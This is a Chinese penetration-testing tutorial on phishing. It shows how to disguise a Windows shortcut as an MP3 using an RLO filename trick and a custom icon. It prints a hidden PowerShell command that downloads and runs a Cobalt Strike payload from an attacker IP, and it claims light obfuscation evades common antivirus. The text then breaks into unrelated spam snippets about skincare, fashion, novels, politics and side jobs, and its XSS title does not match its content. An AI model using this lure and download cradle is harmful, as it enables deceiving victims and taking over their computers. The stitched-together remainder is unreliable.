渗透测试之地基钓鱼篇:thinkphp平台XSS钓鱼
渗透测试-地基篇:
该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式 *** ,望大家能共同加油学到东西。
请注意:
本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。
名言:
你对这行的兴趣,决定你在这行的成就!
*** 钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!
我们来百度了解下Ink的原理,以及利用后续的能力伪造mp3文件进行诱骗用户点击使用!!
lnk 文件是用于指向其他文件的一种文件。 这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用...这里快捷方式在钓鱼的优势是,可以写入免杀的shell代码,双击即可执行,进一步的调节下图标后,能更好的诱骗客户执行!!!
而修改创建一首无损的歌曲mp3来诱骗用户,利用了修改图标、RLO(古老的方式)、免杀shell思路合成后进行诱骗用户使用,并控制对方电脑的过程!!!
开始演示!!
黑客(攻击者):
IP:192.168.2.153
系统:kali.2020.4
VPS服务器:
例如搭建了各种破解软件平台,供客户需求下载!
钓鱼地址:http://xxxx.dayuixiyou.cn
办公电脑:
系统:windwos7
IP:192.168.2.144
目前黑客利用kali运行了Cobalt Strike进行APT攻击 ,通过我介绍的免杀思路,使用Ink和RLO *** 进行封装,假设上传至服务器后,让用户进行下载并获得对方电脑权限的演示过程!!
免杀思路放在最后,目前好几个月了,利用该思路都能过国内的杀软,例如360、火绒、deferencer等等...
这里可以提权后门的有很多文件,这里以powershell.exe进行演示!
这里可以利用Everything或者文件夹本身搜索powershell.exe的绝对路径复制后即可!
目前知道的绝对路径是:
C:\Windows\System32\WindowsPowerShell\v1.0
kali上运行Cobalt Strike,根据图进行点击:Scripted Wed Delivery(s)
选择Listener监听,然后Launch执行即可
这就创建好了一个powershell的回连恶意链接....复制即可!
现在本地创建一个dayu.txt文件,将powershell恶意代码放入进行修改,将代码最前端添加绝对路径....
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.153:80/a'))"
这里免杀就很简单了,base64,混淆上就行....继续往下看!!
怎样有效的去痘印 一定要超有效哦我用过白糖 但效果不明显 珍珠粉+鸡蛋清去痘印法: 珍珠汾和鸡蛋清都是具有镇静和美白肌肤的功效,将两者混合在一起当面膜使用,不但肌肤会越来越柔滑,痘痘的痕迹也能慢慢变淡...
又是跨界优衣库 x 任天堂在日本推出联名 UT。任天堂拿出的形象是马里奥与喷射战士,预计 4 月推出。另外,任天堂 x 日本街头品牌 Glamb 推出联名的“精灵宝可梦”系列......有点夸张。值得...
说到玄幻小说,你是否已被奇妙的情节深深吸引过呢?那种玄幻小说中的人物刻画及精彩爽文会想必会令你热血沸腾吧。本文带来十大必看玄幻小说精彩爽文,老书虫、新书友、玄幻迷、书荒友一定不要错过了。 十大必看玄...
冲之鸟是岛还是礁?蔡英文当局上台后宣布“不采取法律特定立场”。中国国民党基隆市议员吕美玲表示说,今年台湾大选有九成渔民都是投票给蔡英文,所以渔民很失望被民进党骗了,全世界最大的诈骗集团就是民进党。...
刘小局最近进级成了狗妈,不只仅是得到了捡屎特权,她甚至还因此拓展出了一片消费新市场。 “你们家狗儿子平时背这个包?”在和小局的视频画面里,是一个外形神似史努比的小背包和在猖獗啃它的泰迪。 “是啊,pe...
现实压力大,相信很多朋友都想在网上找一份可以利用空闲时间赚钱的工作,但是又担心上当受骗,今天小编在这里就给大家介绍几种用手机电脑在自己家就可以做的网上兼职工作。 怎样利用手机赚钱?在家玩手机日入...